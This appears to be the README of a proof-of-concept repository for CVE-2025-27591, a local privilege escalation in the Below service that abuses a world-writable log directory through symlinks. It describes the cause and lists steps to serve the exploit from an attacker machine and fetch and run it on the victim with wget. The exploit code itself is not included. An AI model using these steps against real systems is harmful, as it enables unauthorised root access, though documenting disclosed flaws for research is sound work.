CVE-2025-27591 is a privilege escalation vulnerability that affected the Below service before version 0.9.0# CVE-2025-27591 Proof Of Concept
CVE-2025-27591 is a privilege escalation vulnerability that affected the Below service before version 0.9.0. The issue arose due to the creation of a world-writable directory at /var/log/below. An attacker could exploit this vulnerability by manipulating symlinks within this directory and potentially gain root privileges, making it a significant security concern for local unprivileged users.
This Proof-of-Concept was written for educational and research purposes only.
At the time of writing, no publicly available PoC for this vulnerability existed in the community.Therefore, I decided to responsibly share this implementation in order to fill that gap, contribute tothe security research ecosystem, and raise awareness about the critical nature of insecure filesystem.
## Cause Of Vulnerability
<img width="772" height="245" alt="image" src="https://github.com/user-attachments/assets/220c4bfb-805b-4f2e-98b2-8e7c3cf7142d" />
## Proof-Of-Concept
From attacker machine:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
From vulnerable system:
1- wget http://<your-ip>/exploit.py
2-python exploit.py
<img width="1901" height="678" alt="image" src="https://github.com/user-attachments/assets/049a7102-856b-4bf0-a27a-0a6f70cb8ec7" />
## References
https://www.facebook.com/security/advisories/cve-2025-27591
https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view